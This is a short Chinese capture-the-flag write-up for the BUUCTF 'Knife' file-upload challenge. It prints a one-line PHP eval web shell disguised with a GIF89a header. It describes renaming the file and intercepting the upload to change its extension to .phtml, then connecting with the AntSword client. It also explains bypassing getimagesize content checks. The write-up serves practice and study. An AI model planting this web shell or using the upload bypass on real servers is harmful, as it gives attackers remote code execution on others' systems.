[极客大挑战 2019]Knife——3.20BUUCTF练习day4(2)
解题内容
在一个文件中输入以下内容,该文件是phtml文件(HTML嵌套PHP代码,可以绕过很多限制)但在本题中要先改文件名为2.gif然后抓包修改后缀名为phtml,因为只可以上传gif和jpg等
GIF89a
<script language='php'>@eval($_POST[shell]);</script>
蚁剑连接
看了别人的wp,发现还可以删除前端校验函数,直接传phtml文件也可以
拓展
在上传的文件代码中含有GIF89a,这个是在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验
PHP getimagesize(服务器端验证)
读取文件头信息,不是解析整个图片,所以效率较高
